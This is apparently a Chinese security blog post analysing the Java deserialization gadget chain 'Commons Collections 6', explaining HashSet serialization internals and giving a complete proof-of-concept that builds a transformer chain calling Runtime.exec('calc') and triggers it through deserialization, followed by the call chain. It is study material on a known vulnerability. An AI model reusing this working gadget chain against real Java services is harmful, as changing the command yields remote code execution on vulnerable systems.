Java反序列化之Commons Collections6链

发表于 2023-01-18 更新于 2023-07-21 分类于 Java安全阅读次数：本文字数： 789 阅读时长 ≈ 3 分钟

Java安全反序列化之CC6链的分析与利用

环境

java版本：jdk8u66（版本无限制）
Commons Collections：3.2.1（漏洞版本在3.1-3.2.1）

前置知识

HashSet

位于java.util包中

官方文档描述：

This class implements the Set interface, backed by a hash table (actually a HashMap instance). It makes no guarantees as to the iteration order of the set; in particular, it does not guarantee that the order will remain constant over time. This class permits the null element.

即HashSet是一个无序且无重复元素的集合，只有Key值，可以看成为value值固定的HashMap

在CC5链中，TiedMapEntry中的hashCode也调用了getValue方法，因此也可以从hashCode方法入手，由于HashMap中的put方法中会触发对key的hash计算，即hashCode函数的调用，故现在的关键是借助HashSet中的方法调用HashMap的put方法

HashSet中的add方法：

1
2
3

public boolean add(E e) {
    return map.put(e, PRESENT)==null;
}

此操作相当于HashMap中值固定的put操作

查看HashSet中的readObject方法：

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    // Consume and ignore stream fields (currently zero).
    s.readFields();

    // Read capacity and verify non-negative.
    int capacity = s.readInt();
    if (capacity < 0) {
        throw new InvalidObjectException("Illegal capacity: " +
                                         capacity);
    }

    // Read load factor and verify positive and non NaN.
    float loadFactor = s.readFloat();
    if (loadFactor <= 0 || Float.isNaN(loadFactor)) {
        throw new InvalidObjectException("Illegal load factor: " +
                                         loadFactor);
    }
    // Clamp load factor to range of 0.25...4.0.
    loadFactor = Math.min(Math.max(0.25f, loadFactor), 4.0f);

    // Read size and verify non-negative.
    int size = s.readInt();
    if (size < 0) {
        throw new InvalidObjectException("Illegal size: " + size);
    }
    // Set the capacity according to the size and load factor ensuring that
    // the HashMap is at least 25% full but clamping to maximum capacity.
    capacity = (int) Math.min(size * Math.min(1 / loadFactor, 4.0f),
                              HashMap.MAXIMUM_CAPACITY);

    // Constructing the backing map will lazily create an array when the first element is
    // added, so check it before construction. Call HashMap.tableSizeFor to compute the
    // actual allocation size. Check Map.Entry[].class since it's the nearest public type to
    // what is actually created.

    SharedSecrets.getJavaOISAccess()
        .checkArray(s, Map.Entry[].class, HashMap.tableSizeFor(capacity));

    // Create backing HashMap
    map = (((HashSet<?>)this) instanceof LinkedHashSet ?
           new LinkedHashMap<E,Object>(capacity, loadFactor) :
           new HashMap<E,Object>(capacity, loadFactor));

    // Read in all elements in the proper order.
    for (int i=0; i<size; i++) {
        @SuppressWarnings("unchecked")
        E e = (E) s.readObject();
        map.put(e, PRESENT);
    }
}

最后的for循环调用了map的put函数

尽管在HashSet对使用transient修饰map

1	private transient HashMap<E,Object> map;

但是在序列化过程中，会逐一读取map中的元素并把元素写入流中

HashSet中的writeObject函数：

private void writeObject(java.io.ObjectOutputStream s)
    throws java.io.IOException {
    // Write out any hidden serialization magic
    s.defaultWriteObject();

    // Write out HashMap capacity and load factor
    s.writeInt(map.capacity());
    s.writeFloat(map.loadFactor());

    // Write out size
    s.writeInt(map.size());

    // Write out all elements in the proper order.
    for (E e : map.keySet())
        s.writeObject(e);
}

同时在反序列化过程中，会从流中逐一读取元素存入新的Map中，如上的readObject函数

POC

package ysoserial;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;


import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class commons_collections6 {
    public static void main(String[] args) throws Exception{
        Transformer Testtransformer = new ChainedTransformer(new Transformer[]{});

        Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };

        Map map=new HashMap();
        Map lazyMap=LazyMap.decorate(map,Testtransformer);
        TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test1");

        HashSet hashSet=new HashSet(1);
        hashSet.add(tiedMapEntry);
        lazyMap.remove("test1");

        //通过反射覆盖原本的iTransformers，防止序列化时在本地执行命令
        Field field = ChainedTransformer.class.getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(Testtransformer, transformers);

        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
        objectOutputStream.writeObject(hashSet);
        objectOutputStream.close();

        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test.out"));
        objectInputStream.readObject();
    }
}

调用链：

HashSet.readObject
->HashMap.put
->HashMap.hash
->TiedMapEntry.hashCode
->TiedMapEntry.getValue
->LazyMap.get
->ChainedTransformer.transform
->InvokerTransformer.transform
->Runtime.exec

参考

java安全-CC6链学习与分析 | Okaytc

Java安全之Commons Collections6分析 - nice_0e3 - 博客园 (cnblogs.com)